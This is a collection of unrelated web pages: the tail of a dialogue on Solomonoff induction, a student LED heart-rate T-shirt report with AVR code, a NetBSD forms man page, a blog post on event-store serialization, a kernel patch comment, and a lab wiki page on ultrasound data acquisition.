much huger program—a complete mind that implements anger, vengeance, belief, memory, consequentialism, etcetera. 
Solomonoff induction is what tells us to retrain our intuitions so that differential equations feel like less burdensome explanations than heroic mythology. ASHLEY: Now hold on just a second, if that's actually how Solomonoff induction works then it's not working very well. I mean, Abraham Lincoln was a great big complicated mechanism from an algorithmic standpoint—he had a hundred trillion synapses in his brain—but that doesn't mean I should look at the historical role supposedly filled by Abraham Lincoln, and look for simple mechanical rules that would account for the things Lincoln is said to have done. If you've already seen humans and you've already learned to model human minds, it shouldn't cost a vast amount to say there's one more human, like Lincoln, or one more entity that is cognitively humanoid, like the Old Testament jealous-god version of Jehovah. It may be wrong but it shouldn't be vastly improbable a priori. If you've already been forced to acknowledge the existence of some humanlike minds, why not others? Shouldn't you get to reuse the complexity that you postulated to explain humans, in postulating Jehovah? In fact, shouldn't that be what Solomonoff induction does? If you have a computer program that can model and predict humans, it should only be a slight modification of that program—only slightly longer in length and added code—to predict the modified-human entity that is Jehovah. BLAINE: Hm. That's fair. I may have to retreat from that example somewhat. In fact, that's yet another point to the credit of Solomonoff induction! The ability of programs to reuse code, incorporates our intuitive sense that if you've already postulated one kind of thing, it shouldn't cost as much to postulate a similar kind of thing elsewhere! ASHLEY: Uh huh. 
BLAINE: Well, but even if I was wrong that Solomonoff induction should make Jehovah seem very improbable, it's still Solomonoff induction that says that the alternative hypothesis of 'diffraction' shouldn't itself be seen as burdensome—even though diffraction might require a longer time to explain to a human, it's still at heart a simple program. ASHLEY: Hmm. I'm trying to think if there's some notion of 'simplicity' that I can abstract away from 'simple program' as the nice property that diffraction has as an explanation for rainbows, but I guess anything I try to say is going to come down to some way of counting the wheels and gears inside the explanation, and justify the complexity penalty on probability by the increased space of possible configurations each time we add a new gear. And I can't make it be about surface details because that will make whole humans seem way too improbable. If I have to use simply specified systems and I can't use surface details or runtime, that's probably going to end up basically equivalent to Solomonoff induction. So in that case we might as well use Solomonoff induction, which is probably simpler than whatever I'll think up and will give us the same advice. Okay, you've mostly convinced me. BLAINE: Mostly? What's left? vii. Limitations ASHLEY: Well, several things. Most of all, I think of how simple hypotheses let you compress lots of data into compact reasons which strongly predict seeing just that data and no other data; yet logic can't dictate prior probabilities absolutely, and it remains a choice if you assign probability less than 2^-1,000,000 for the purpose of evaluating hypotheses' complexity. And if something seems "weird" to you but would be a consequence of simple rules that fit the evidence so far, well, there's nothing in these explicit laws of epistemology that adds a penalty for weirdness. Here's another thing: I feel like I didn't have to learn how to model the human beings around me from scratch based on environmental observations.
I got a jump-start on modeling other humans by observing myself, and by recruiting my brain areas to run in a sandbox mode that models other people's brain areas—empathy, in a word. I guess I feel like Solomonoff induction doesn't incorporate that idea. Like, maybe inside the mixture there are programs which do that, but there's no explicit support in the outer formalism. BLAINE: This doesn't feel to me like much of a disadvantage of Solomonoff induction— ASHLEY: I'm not saying it would be a disadvantage if we actually had a hypercomputer to run Solomonoff induction. I'm saying it might point in the direction of "good epistemology" that isn't explicitly included in Solomonoff induction. I mean, now that I think about it, a generalization of what I just said is that Solomonoff induction assumes I'm separated from the environment by a hard, Cartesian wall that occasionally hands me observations. Shouldn't a more realistic view of the universe be about a simple program that contains me somewhere inside it, rather than a simple program that hands observations to some other program? BLAINE: Hm. Maybe. How would you formalize that? It seems to open up a big can of worms— ASHLEY: But that's what my actual epistemology actually says. My world-model is not about a big computer program that provides inputs to my soul, it's about an enormous mathematically simple physical universe that instantiates Ashley as one piece of it. And I think it's good and important to have epistemology that works that way. It wasn't obvious that we needed to think about a simple universe that embeds us. Descartes did think in terms of an impervious soul that had the universe projecting sensory information onto its screen, and we had to get away from that kind of epistemology. BLAINE: You understand that Solomonoff induction makes only a bounded number of errors relative to any computer program which does reason the way you prefer, right? 
If thinking of yourself as a contiguous piece of the universe lets you make better experimental predictions, programs which reason that way will rapidly be promoted. ASHLEY: It's still unnerving to see a formalism that seems, in its own structure, to harken back to the Cartesian days of a separate soul watching a separate universe projecting sensory information on a screen. Who knows, maybe that would somehow come back to bite you? BLAINE: Well, it wouldn't bite you in the form of repeatedly making wrong experimental predictions. ASHLEY: But it might bite you in the form of having no way to represent the observation of, "I drank this 'wine' liquid and then my emotions changed; could my emotions themselves be instantiated in stuff that can interact with some component of this liquid? Can alcohol touch neurons and influence them, meaning that I'm not a separate soul?" If we interrogated the Solomonoff inductor, would it be able to understand that reasoning? Which brings up that dangling question from before about modeling the effect that my actions and choices have on the environment, and whether, say, an agent that used Solomonoff induction would be able to correctly predict "If I drop an anvil on my head, my sequence of sensory observations will end." ELIEZER: And that's my cue to step in! The natural next place for this dialogue to go, if I ever write a continuation, is the question of actions and choices, and the agent that uses Solomonoff induction for beliefs and expected reward maximization for selecting actions—the perfect rolling sphere of advanced agent theory, AIXI. Meanwhile: For more about the issues Ashley raised with agents being a contiguous part of the universe, see "Embedded Agency." Previously linked here:
https://www.alignmentforum.org/posts/EL4HNa92Z95FKL9R2/a-semitechnical-introductory-dialogue-on-solomonoff-1
by Vivian Jang (vij2) and Nick Lee (nsl7)

We have designed and built an LED t-shirt capable of displaying the heart rate of the wearer via a pulsing LED heart. Broadly, our project consists of two components: the plethysmograph and the LED display. We thought up the idea of a heart-rate-display LED shirt when we came across the LED shirt manufactured by Erogear. Erogear sells customized wearable LED displays through their website at erogear.com. One of the possible designs offered is the one shown in the figure. The time delay of the timer's output in a monostable configuration can be adjusted according to the nomograph in Figure 9. Because a heart beat ought not to occur more often than every 100 ms, we chose an RA of 1 MΩ and a C value of 0.1 µF for the circuit shown in Figure 6. For the half shot, we chose a resistor value of 1 MΩ and a capacitor of 0.022 µF, which yielded a time constant of 22 ms. Since the time delay of the timer's output is a little under 100 ms, the capacitor would be essentially fully charged every time the timer triggers, and consequently ready to discharge when it has to. The pin assignments are shown in Table 1. Our software can be broken into three sections: the timer and interrupt, the heart pulse monitor, and the LED control. Fortunately, the timer and interrupt code is very simple. We only use Timer0 prescaled by 64 and the compare-on-match ISR. With OCR0A at 249, the ISR triggers every 1 ms. The ISR task then decrements two simple time variables that control the two other tasks. Having the ISR trigger every 1 ms is fast enough for the comparatively slow heart beat but slow enough for the response time of the LEDs. Called pulse() in the code, the heart pulse monitor utilizes the built-in ADC of the ATmega644 on pin A0. Using the value from the ADC, we are able to determine whether a heart pulse has occurred or not. We based this code on the lunar lander lab.
Because a normal heart rate is around 72 beats per minute, or 1 beat every 0.833 seconds, we chose a sampling period of roughly 20 ms. We felt this was quick enough to get reasonably good precision compared to the relatively slow heart rate, but not so time-intensive as to keep the MCU from performing its other tasks. In order to help prevent false "heart beats" due to interference on the line, we use a running average of the past 250 values taken in from the ADC. Combining this with a simple two-state state machine, we count a rise in the ADC value as a heart beat only if the ADC values were below the running average first, and we prepare for the next heart beat after the ADC value drops back below the running average. Each time the code determines that an actual heart beat has occurred, it sets the trigger for the LED state machine explained in the next section. Called blink(), this task controls the LEDs with a four-state state machine. By setting all the connected pins as outputs and using ten pins in a two-pin charlieplex scheme, we control the 40 LEDs. We then use a single pin to control the analog timer. We step through the state machine by simply toggling between output high and output low. The LED state machine checks whether it has to move into the next state every 75 ms. Overall, the code was fairly simple to write. The most difficult part to come up with was the running average. Before the running average, the MCU would count all rising edges as heart beats, which included any and all interference on the line. Looking into possible solutions, we came up with either an automatic gain control circuit with specific thresholds or a running-average scheme. We eventually decided on the running average instead of the AGC because the running average was code-only, and it worked. The shirt's display propagates properly whenever a heart beat is detected.
There are some false "heart beats" detected as actual heart beats, but for the most part, it works. The LEDs light up when we want them to, and the analog timers react to each other as intended. Also, at first we tried to measure our heart rate via the earlobe, but because of difficulties associated with clipping the detector onto the earlobe, we settled on holding it against a finger. The picture of the final shirt is shown in Figure 10. Fortunately, we did not have to do much to make our design safe. Although we had many wire connections, we cut the wires to shorter lengths and covered wire connections with electrical tape, not only to prevent the wires from scratching the wearer but also to help electrically isolate the wires from each other. We put the MCU, plethysmograph, and analog timers in inner pockets on the shirt for the same reasons. Our project did not and probably would not interfere with any other project. On the other hand, with the long wire leads in the shirt, our project is more susceptible to interference of any kind, electrical or mechanical. Considering that every now and then we get "false beats", we can assume they are caused by interference. For the most part, our plethysmograph ought to work with anybody, and consequently, so should the LEDs. There are only two limitations: the size of the shirt itself and the power cord. The shirt is medium sized, so individuals who wear shirts larger than that will not be able to wear it comfortably. Because the MCU is powered by a 12 V AC adapter, the wearer cannot stray too far from the outlet he or she is plugged into. At first, we had trouble detecting the heart pulse from the finger and earlobe. Luckily, we soon found out that loosely holding the IR emitter and phototransistor against a finger did the trick. Unfortunately, we found that holding the sensor against the ear too firmly would push the blood out of the area, rendering the plethysmograph ineffective.
We actually had much trouble deciding on a design for the shirt. The $75 budget limited the number of LEDs we could buy, and we had to compromise on the design to do what we envisioned with fewer LEDs. The next biggest obstacle we encountered was the wiring of the shirt. Keeping track of the wires and making sure there were good connections was not a trivial task. Figure 11 shows the basic wiring mess we had to deal with. In the end, we successfully designed and created an LED T-shirt capable of taking the heart rate of the wearer and displaying it. The product turned out to be more robust than we expected, as the plethysmograph was able to take the pulse while the wearer was moving around and talking. To improve further, we could replace all the wires with conductive thread. This would beautify our T-shirt significantly and make the wiring less of a nightmare. The code for implementing the ADC function and ISR of the microcontroller was largely adapted from the templates provided to us by Professor Bruce Land for our lab practicals of ECE 4760. For this project, we did not use code in the public domain. We have, however, adapted code from Professor Bruce Land. We also did not reverse-engineer a design. We were inspired by the LED T-shirt produced by Erogear. We did not receive any sample parts for this project. At this time, we are not aware of any patent or publishing opportunities. There were no engineering standards applicable to this project. Our heart-display LED T-shirt follows the IEEE Code of Ethics. Our project does not harm any individual or jeopardize the community. If a problem arises, we will be prompt in notifying anyone who might be affected. We have been absolutely realistic and truthful in our claims and estimates of our data. We have and will continue to reject bribery in all its forms. Our project may have improved the understanding of technology and demonstrated the possibility of wearable electronics.
We will continue to improve our technical competence and apply our knowledge only if deemed qualified. With the knowledge that we acquire, we will assist colleagues and co-workers in their professional development and support them in following this code of ethics. If criticism regarding our project arises, we will handle it with professionalism and acknowledge our errors. We have and will always treat every individual equally regardless of race, religion, gender, disability, age or national origin. Vivian Jang: Construction of Plethysmograph and T-shirt, Website, Nick Lee: Software, Testing of Charlieplex and Analog Timer, Construction of Prototype Board #include <inttypes.h> #include <avr/io.h> #include <avr/interrupt.h> #include <stdio.h> #define bt 75 //75ms #define pt 20 //20ms #define HEART 0 #define RING 1 #define WAVE 2 #define WAIT 3 #define High 1 #define Low 0 void blink(void); void pulse(void); void initialize(void); volatile unsigned char blinktime, pulsetime; //task timers char Ain, Ain_prev ; //raw A to D number //moving avg char avgarray[250]; //using the past 250 values char avgpointer, avg; // avgpointer is for navigating the array int sumavg; //sum of past 250 Ain char PulseState; //state for pulse unsigned char count; //state for blink int main(void){ initialize(); while(1){ if (blinktime==0) {blinktime=bt; blink(); } if (pulsetime==0) {pulsetime=pt; pulse(); } } } void pulse(void) { //get the sample Ain = ADCH; //start another conversion ADCSRA |= (1<<ADSC) ; //results to hyperterm avgarray[avgpointer]=Ain; avgpointer++; sumavg=sumavg+Ain; if (avgpointer==250){ //full array avgpointer=0; //reset pointer sumavg=sumavg-avgarray[0]; //subtract the oldest Ain from sumavg } else sumavg=sumavg-avgarray[avgpointer+1]; //subtract the oldest Ain from sumavg avg=(char)(sumavg/250); switch (PulseState){ case Low: if (Ain>avg) { //rising edge of heart beat PulseState=High; count=0; //resets the LED state machine } break; case High: if (Ain<avg) 
            PulseState = Low;  // falling edge
        break;
    }
}

void blink(void)
{
    // we use 5 ports from D and C to control the LEDs
    // Although LEDs are split into different groups, we just change the
    // controlling pins at the same time.
    switch (count) {
    case HEART:
        PORTD = (1<<PORTD0)|(1<<PORTD1)|(1<<PORTD2)|(1<<PORTD3)|(1<<PORTD4);
        PORTC = (0<<PORTC0)|(0<<PORTC1)|(0<<PORTC2)|(0<<PORTC3)|(0<<PORTC4);
        break;
    case RING:
        PORTD = (0<<PORTD0)|(0<<PORTD1)|(0<<PORTD2)|(0<<PORTD3)|(0<<PORTD4);
        PORTC = (1<<PORTC0)|(1<<PORTC1)|(1<<PORTC2)|(1<<PORTC3)|(1<<PORTC4);
        break;
    case WAVE:
        // start analog timers with A1
        PORTD = (0<<PORTD0)|(0<<PORTD1)|(0<<PORTD2)|(0<<PORTD3)|(0<<PORTD4);
        PORTC = (0<<PORTC0)|(0<<PORTC1)|(0<<PORTC2)|(0<<PORTC3)|(0<<PORTC4);
        PORTA = (0<<PORTA1);
        break;
    case WAIT:
        PORTD = (0<<PORTD0)|(0<<PORTD1)|(0<<PORTD2)|(0<<PORTD3)|(0<<PORTD4);
        PORTC = (0<<PORTC0)|(0<<PORTC1)|(0<<PORTC2)|(0<<PORTC3)|(0<<PORTC4);
        PORTA = (1<<PORTA1);
        break;
    }
    if (count >= WAIT)
        count = WAIT;
    else
        count++;
}

void initialize(void)
{
    DDRA = 0xfe;  // all outputs except for A0
    DDRD = 0xff;
    DDRC = 0xff;
    // set up timer 0 for 1 mSec ticks
    TIMSK0 = 2;           // turn on timer 0 cmp match ISR
    OCR0A = 249;          // set the compare reg to 250 time ticks
    TCCR0A = 0b00000010;  // turn on clear-on-match
    TCCR0B = 0b00000011;  // clock prescaler to 64
    // init the A to D converter
    // channel zero / left adj / EXTERNAL Aref
    // sets prototype board's Aref
    ADMUX = (1 << REFS1) | (1 << REFS0) | (1 << ADLAR);
    // enable ADC and set prescaler to 1/128*16MHz=125,000
    // and clear interrupt enable
    // and start a conversion
    ADCSRA = (1 << ADEN) | (1 << ADSC) + 7;
    Ain_prev = 0;
    blinktime = bt;
    pulsetime = pt;
    count = WAIT;
    PulseState = Low;
    avgpointer = 0;
    sumavg = 0;
    avg = 0;
    sei();
}

References: Mega644 Datasheet; Wikipedia - Charlieplexing; IR Emitter; Phototransistor; LEDs; LM555 analog timer; Erogear; Professor Bruce Land

Nick and I would like to thank Professor Bruce Land for helping us make the LED T-Shirt a reality. We'd also like to thank all our TAs for helping us out.
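The beat detection in pulse() boils down to comparing each new ADC sample against a moving average and firing on the low-to-high crossing. The same idea can be sketched in plain Python with made-up sample data (the window length and signal here are illustrative, not the shirt's actual 250-sample buffer):

```python
def detect_beats(samples, window=5):
    """Report the index of each low-to-high crossing of the signal
    over its own moving average -- the pulse() state machine in miniature."""
    beats = []
    state_high = False
    history = []
    for i, s in enumerate(samples):
        history.append(s)
        if len(history) > window:
            history.pop(0)
        avg = sum(history) / len(history)
        if not state_high and s > avg:
            state_high = True   # rising edge of heart beat
            beats.append(i)
        elif state_high and s < avg:
            state_high = False  # falling edge
    return beats

# A synthetic signal with two clear peaks over a flat baseline.
signal = [10, 10, 10, 30, 30, 10, 10, 10, 30, 30, 10, 10]
print(detect_beats(signal))  # -> [3, 8]
```

Unlike the AVR code, which subtracts the oldest sample from a running sum to stay cheap, this sketch recomputes the average each step for clarity.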
https://people.ece.cornell.edu/land/courses/ece4760/FinalProjects/s2010/vij2/LEDshirt/LEDshirt/
FORMS(3)                 Library Functions Manual                 FORMS(3)

NAME
     form_sub, form_win, scale_form, set_form_sub, set_form_win -- form
     library

LIBRARY
     Curses Form Library (libform, -lform)

SYNOPSIS
     #include <form.h>

     WINDOW *
     form_sub(FORM *form);

     WINDOW *
     form_win(FORM *form);

     int
     scale_form(FORM *form, int *rows, int *cols);

     int
     set_form_sub(FORM *form, WINDOW *window);

     int
     set_form_win(FORM *form, WINDOW *window);

DESCRIPTION
     All output to the screen done by the forms library is handled by the
     curses library routines.  By default, the forms library will output to
     the curses stdscr, but if the forms window has been set via
     set_form_win() then output will be sent to the window specified by
     set_form_win(), unless the forms subwindow has been set using
     set_form_sub().  If a subwindow has been specified using
     set_form_sub() then it will be used by the forms library for screen
     output.

     The current setting for the form window can be retrieved by calling
     form_win().  If the forms window has not been set then NULL will be
     returned.  Similarly, the forms subwindow can be found by calling the
     form_sub() function; again, if the subwindow has not been set then
     NULL will be returned.

     The scale_form() function will return the minimum number of rows and
     columns that will entirely contain the given form.

RETURN VALUES
     Functions returning pointers will return NULL if an error is
     detected.  The functions that return an int will return one of the
     following error values:

     E_OK               The function was successful.
     E_NOT_CONNECTED    The form has no fields connected to it.
     E_POSTED           The form is posted to the screen.

SEE ALSO
     curses(3), forms(3)

NOTES
     The header <form.h> automatically includes both <curses.h> and
     <eti.h>.

NetBSD 6.1.5                  January 1, 2001                 NetBSD 6.1.5
http://modman.unixdev.net/?sektion=3&page=form_win&manpath=NetBSD-6.1.5
In this series of posts I discuss how we do CQRS and event sourcing. One of our main goals was to reduce the overall complexity of our solution, which ultimately led us to the point where we got rid of our database. Please see my previous posts for further details (part 1, part 2, part 3, part 4 and part 5).

In this post we will discuss how events generated by our aggregates are serialized and then stored in the event store. Remember, we do not use any database to store data and thus have to provide our own persistence mechanism.

Note: the code snippets presented in this post represent a simplified version of code found in Lokad.CQRS. This code is used to show the core concepts.

Serializing and deserializing an event

Since we are not going to use a database to store our data we are now on our own. Let's first choose a serialization format that suits our needs. What do we need?

- Serialization and deserialization should be fast
- The serialized data should be as compact as possible
- The serialization process should be tolerant of changes in the events, e.g. allow us to rename properties of the event or add new properties to the event

It turns out that Google's protocol buffer format is the ideal choice. And luckily we find a NuGet package which gives us an implementation of the serializer/deserializer for .NET.

Let's define an interface that provides what we need. We have a method SerializeEvent which accepts an event and returns the serialized event as an array of bytes. Of course we then need the counterpart, which does the opposite: the method DeserializeEvent accepts an array of bytes and returns the deserialized event.

Now please note that the SerializeEvent method accepts any event that implements IEvent<IIdentity>. The serialization of the event is no problem, but to be able to deserialize the event we need to know the concrete type of the event we had previously serialized.
Thus we need to somehow serialize the type, or rather the contract name, of the event together with the content of the event. This fact slightly complicates the whole process. But as you will see, there is still no rocket science involved. Each step is simple.

Let's first define a helper class Formatter which contains the contract name of an event, a delegate to serialize this event and another to deserialize it. As you can see, the serializer delegate takes an object and serializes it into a stream. The deserializer delegate takes a stream (containing the serialized event), deserializes its content and returns it as an object.

We want to create an instance of Formatter for each event that we have in our system. To get all event types we can use code similar to this. The result will be our known event types. Note that line 18 will become evident in a minute.

The Formatter class introduced above is hosted by the EventSerializer class, which is responsible for the actual event serialization/deserialization. We inject the known event types via constructor into this class. The EventSerializer takes these known types and creates two dictionaries out of them:

- one that gives a formatter instance provided the event type, and
- one that gives the event type provided its (contract-) name

We use the RuntimeTypeModel class of the protobuf-net library to get a formatter (the instance that serializes/deserializes the event to an array of bytes). We also use an extension method GetContractName to get the contract name of the event type. It is defined as follows.

In the above method we take the namespace of the event from the [DataContract] attribute with which we have to decorate each event in order to make it serializable using the protocol buffer format (see our NewTaskScheduled event).

With all this preparation the actual serialization of the event is quite easy. The method Serialize shown above takes an event instance and its type and serializes it into the given destination stream.
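The shape of the two lookups that EventSerializer builds can be sketched in Python, with JSON standing in for protocol buffers and a made-up event class; everything here is illustrative of the idea, not the Lokad.CQRS API:

```python
import json

class Formatter:
    """Pairs a contract name with serialize/deserialize delegates,
    mirroring the C# Formatter class (JSON stands in for protobuf)."""
    def __init__(self, contract_name, cls):
        self.contract_name = contract_name
        self.cls = cls

    def serialize(self, event):
        return json.dumps(event.__dict__).encode("utf-8")

    def deserialize(self, data):
        # Rebuild an instance of the concrete type from the raw bytes.
        obj = self.cls.__new__(self.cls)
        obj.__dict__.update(json.loads(data.decode("utf-8")))
        return obj

class NewTaskScheduled:
    def __init__(self, task_id, name):
        self.task_id = task_id
        self.name = name

# The two dictionaries: type -> formatter, and contract name -> type.
formatters = {NewTaskScheduled: Formatter("NewTaskScheduled", NewTaskScheduled)}
type_by_name = {"NewTaskScheduled": NewTaskScheduled}

event = NewTaskScheduled(42, "write report")
blob = formatters[type(event)].serialize(event)
restored = formatters[type_by_name["NewTaskScheduled"]].deserialize(blob)
print(restored.task_id, restored.name)  # -> 42 write report
```

The second dictionary is exactly what makes deserialization possible: given only the contract name stored next to the bytes, we can recover the concrete type and hand the bytes to its formatter.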
The deserialization is a two-step process. First we take the contract name of the event and look up the corresponding (event-) type. Having this type we can deserialize the event. The above method gets the stream from which it reads the serialized content of the event, as well as the event type. The method returns the deserialized event (as object).

That was not so bad, was it? No magic or rocket science needed so far.

OK, then we can now discuss the implementation of the IEventStreamer interface that I introduced at the beginning of this section. The class that we will now discuss not only writes the (serialized) content of the event to a stream but also some message contract information (or message header; where an event is a message). First of all the EventStreamer class uses our EventSerializer.

Let's now show the SerializeEvent method and then discuss its various parts. The method consists of 3 parts:

- line 22-27: we use the event serializer class discussed above to serialize the event (=content)
- line 29-36: we serialize a message contract which contains the event type name (=contract name), the length of the content as well as the content position (=messageContractBuffer)
- line 38-45: we open a stream and first write the (serialized) message header contract into it (line 41). Then we append the messageContractBuffer to the stream and finally we append the content to the stream. Last we return the content of the stream (line 44)

The DeserializeEvent method has to do the exact opposite of the above method. Let's have a look at it. On line 50 we create a memory stream around the buffer containing the serialized data. Then we have again our 3 steps:

- line 52-53: read and deserialize the message header contract. From it we get the length of the message header that will be deserialized in step 2
- line 55-58: read and deserialize the message header.
From the previous step we know exactly how many bytes we have to read (header.HeaderBytes)
- line 60-65: read and deserialize the event. From step two we know the length of the content and thus how many bytes we have to read (contract.ContentSize).

To be complete I also have to show the MessageContract and the MessageHeaderContract classes. The MessageContract class contains information about the event. We specifically need the contract name and the size of the event when it is serialized (the content length). Since the message contract is serialized using protocol buffers we have decorated it with [DataMember] attributes.

The MessageHeaderContract contains information about the MessageContract, namely the length of the message contract when it is serialized. It also contains logic to write and read itself to a stream. We do not need protocol buffers here since it is trivial and of fixed length (just a long, which is 8 bytes).

With this we have the basis to store events in the event store and subsequently read them back from the event store when needed. Let's now look at the event store in detail.

Saving events to the event store

We want to create a file per aggregate instance which contains all events generated by this particular aggregate. Any new event is serialized into an array of bytes (as discussed in the previous section) and then appended to this file. With each event we also store:

- the length of the serialized event (the data length),
- the version of the event (starting from 1 for the first event in the life cycle of an aggregate) and
- the hash code of the serialized event, to recognize whether the data is corrupt or has been tampered with.

Let's start and create a class that allows us to append an array of bytes (the serialized event) to the file which contains all events of an aggregate. This class has an Append method which accepts as parameter the said array of bytes.
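The three-part framing used by SerializeEvent/DeserializeEvent (a fixed-length header carrying the contract length, then the message contract, then the content) can be sketched in Python. JSON stands in for the protobuf-encoded MessageContract, and the exact field layout is illustrative, not byte-compatible with the C# classes:

```python
import json
import struct

def frame(contract_name, content):
    """Layout: [8-byte header length][header: name + content size][content]."""
    header = json.dumps({"name": contract_name, "size": len(content)}).encode()
    return struct.pack(">q", len(header)) + header + content

def unframe(buf):
    # Step 1: the fixed-length prefix tells us how long the header is.
    header_len = struct.unpack(">q", buf[:8])[0]
    # Step 2: the header tells us the contract name and the content size.
    header = json.loads(buf[8:8 + header_len].decode())
    # Step 3: read exactly that many content bytes.
    start = 8 + header_len
    return header["name"], buf[start:start + header["size"]]

msg = frame("NewTaskScheduled", b"\x01\x02\x03")
name, content = unframe(msg)
print(name, content)
```

Each step reads a known number of bytes, which is exactly why the lengths are written first: the reader never has to scan or guess where a field ends.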
Note that for write operations the file is opened in a mode that allows a single writer but many concurrent readers (line 16). We use a helper class TapeStreamSerializer to do the actual write operation. Note that in this first draft we always write version = 1 to the file, no matter how many events we have stored before.

Let's now look into the TapeStreamSerializer class. The WriteRecord method uses a binary serializer to write the record into a memory stream. We also use the SHA1Managed class of the .NET framework to calculate the hash code of the serialized event. On lines 22 to 24 we create a header containing the length of the serialized event (the data array) and write it into the memory stream. Then on line 26 we write the actual data array into the memory stream, and on lines 27 to 31 we add a footer section to the stream. The footer contains once again the length of the data array, the version of the event and the hash code computed from the data array. Once we have everything written to the memory stream we append this data to the file (line 34) and we are done.

The above method uses two simple helper methods to write a 64-bit integer (lines 23, 28 and 29) and a hash code (line 30) into the memory stream.

Reading events from the event store

We now want a way to read all existing events of a given aggregate from the event store. For this purpose we implement the ReadRecords method in our FileTapeStream class. On line 42 we make sure we have arrived at the end of the file and no more records can be retrieved. On line 45 we again use the helper class TapeStreamSerializer to do the actual reading of a single event record from the file.

The above method returns an array of TapeRecord items. A TapeRecord item contains the serialized event as well as its version.

Let's now look into the ReadRecord method of the helper class. We basically have to revert the write operation we described earlier.
First we try to locate, read and validate the header information (lines 72-74). The header has a fixed length, thus we know exactly how many bytes to read. Then we read the data (lines 76 and 77). We know how many bytes we need to read since the data length was stored in the header. Finally we read and verify the footer, which is also of fixed length (lines 79-92). Specifically we make sure that the stored hash code corresponds to the ad-hoc calculated hash code of the data array (lines 83-91). We use helper methods to read a 64-bit integer, to read the hash code, and finally to read and verify a specific signature like e.g. 'header start' or 'footer end'.

Summary

In this post we discussed in detail how events generated by aggregates are serialized and then appended to the event store. I also showed how those serialized events can be read from the event store. In my next post I will discuss how we can integrate this code into our sample application. Stay tuned.
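The tape-record layout from this post (a header with the data length, the data itself, then a footer repeating the length plus the version and a SHA-1 hash) can be sketched in Python. Offsets and field order are illustrative, not byte-compatible with the C# TapeStreamSerializer:

```python
import hashlib
import struct

def write_record(data, version):
    """Layout: [data length][data][data length][version][SHA-1 of data]."""
    digest = hashlib.sha1(data).digest()  # 20 bytes
    return (struct.pack(">q", len(data)) + data +
            struct.pack(">qq", len(data), version) + digest)

def read_record(buf):
    # Header: fixed 8 bytes, tells us how much data follows.
    (length,) = struct.unpack(">q", buf[:8])
    data = buf[8:8 + length]
    # Footer: length again, version, then the stored hash.
    length2, version = struct.unpack(">qq", buf[8 + length:24 + length])
    stored_hash = buf[24 + length:44 + length]
    # Detect corruption or tampering by recomputing the hash.
    if length2 != length or hashlib.sha1(data).digest() != stored_hash:
        raise ValueError("corrupt record")
    return data, version

rec = write_record(b"serialized event", 1)
data, version = read_record(rec)
print(version, data)  # -> 1 b'serialized event'
```

Flipping a single byte of the stored data makes the recomputed hash disagree with the stored one, so read_record raises instead of silently returning garbage, which is the whole point of the footer.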
https://lostechies.com/gabrielschenker/2012/06/30/how-we-got-rid-of-the-databasepart-6/
On Fri, 11 Jul 2008 15:14:43 +0100 David Howells wrote:

> Fix warnings on calls to P54P_READ() for which the result is discarded
> because the side-effect of accessing hardware is what's of interest, not
> the result of performing the read.
>
> The warnings are of the form:
>
> drivers/net/wireless/p54/p54pci.c:55: warning: value computed is not used

hm, why aren't I seeing these?

> Casting to (void) gets rid of this.

This makes the ugly uglier. Would it fix the warnings if we were to do

-#define P54P_READ(r) (__force __le32)__raw_readl(&priv->map->r)
+static inline __le32 p54p_read(__le32 *addr)
+{
+	return (__force __le32)__raw_readl(addr);
+}

....

-	P54P_READ(dev_int);
+	p54p_read(&priv->map->dev_int);

or something along those lines? Because the cpp trickery in there really
isn't very nice.
http://fixunix.com/kernel/506838-%5Bpatch%5D-fix-warnings-calls-p54p_read-result-discarded.html
Ultrasound acquisition

From Phonlab

The Phonology Lab has a SonixTablet system from Ultrasonix for performing ultrasound studies. Consult with Susan Lin for permission to use this system.

Data acquisition workflow

The standard way to acquire ultrasound data is to run an Opensesame experiment on a data acquisition computer that controls the SonixTablet and saves timestamped data and metadata for each acquisition.

Prepare the experiment

The first step is to prepare your experiment. You will need to create an Opensesame script with a series of speaking prompts and data acquisition commands. In simple situations you can simply edit a few variables in our sample script and be ready to go. Do not start your OpenSesame experiment until after turning the Ultrasonix system on, or you risk the system not starting.

Run the experiment

These are the steps you take when you are ready to run your experiment:

Check the audio card

Normally the Steinberg UR22 USB audio interface is used to collect microphone and synchronization signals.

- Plug the microphone into XLR input 1.
- Plug the synchronization signal cable into XLR input 2.
- Check to make sure the 'Mix' knob is turned all the way to 'DAW'.
- Set the gain levels for the microphone and synchronization signals with the 'Input 1' and 'Input 2' knobs.

Start the ultrasound system

- Unplug one of the external monitors' video cables from the splitter that is plugged into the Ultrasonix's external video port.
- Turn on the ultrasound system's power supply, found on the floor beneath the system.
- Turn on the ultrasound system with the pushbutton on the left side of the machine.
- Once Windows has started you can plug the second external monitor's video cable back into the splitter.
- Start the Sonix RP software.
- If the software is in fullscreen (clinical) mode, switch to windowed research mode as illustrated in the screenshot.
Start the data acquisition system

- Turn on the data acquisition computer next to the ultrasound system and use the LingGuest account.
- Check your hardware connections and settings:
  - The Steinberg UR22 USB audio device should be connected to the data acquisition computer.
  - The subject microphone should be connected to 'Mic/Line 1' of the audio device. Use the patch panel if your subject will be in the soundbooth.
  - Make sure the '+48V' switch on the back of the audio device is set to 'On' if you are using a condenser mic (usually recommended).
  - Make a test audio recording of your subject and adjust the audio device's 'Input 1 Gain' setting as needed.
  - The synchronization signal cable should be connected to the BNC connector labelled '25' on the SonixTablet, and the other end should be connected to 'Mic/Line 2' of the audio device.
  - The audio device's 'Input 2 Hi-Z' button should be selected (pressed in).
  - The audio device's 'Input 2 Gain' setting should be at the dial's midpoint.
- Open and run your Opensesame experiment.

Postprocessing

Each acquisition resides in its own timestamped directory. If you follow the normal Opensesame script conventions these directories are created in per-subject subdirectories of your base data directory. Normal output includes a .bpr file containing ultrasound image data, a .wav containing speech data and the ultrasound synchronization signal in separate channels, and a .idx.txt file containing the frame indexes of each frame of data in the .bpr file.

Getting the code

Some of the examples in this section make use of the ultratils and audiolabel Python packages from within the Berkeley Phonetics Machine environment. Other examples are shown in the Windows environment as it exists on the Phonology Lab's data acquisition machine.
To keep up-to-date with the code in the BPM, open a Terminal window in the virtual machine and give these commands:

sudo bpm-update bpm-update
sudo bpm-update ultratils
sudo bpm-update audiolabel

Note that the audiolabel package distributed in the current BPM image (2015-spring) is not recent enough for working with ultrasound data, and it needs to be updated. ultratils is not in the current BPM image at all.

Synchronizing audio and ultrasound images

The first task in postprocessing is to find the synchronization pulses in the .wav file and relate them to the frame indexes in the .idx.txt file. You can do this with the psync script, which you can call on the data acquisition workstation like this:

python C:\Anaconda\Scripts\psync --seek <datadir>   # Windows environment
psync --seek <datadir>                              # BPM environment

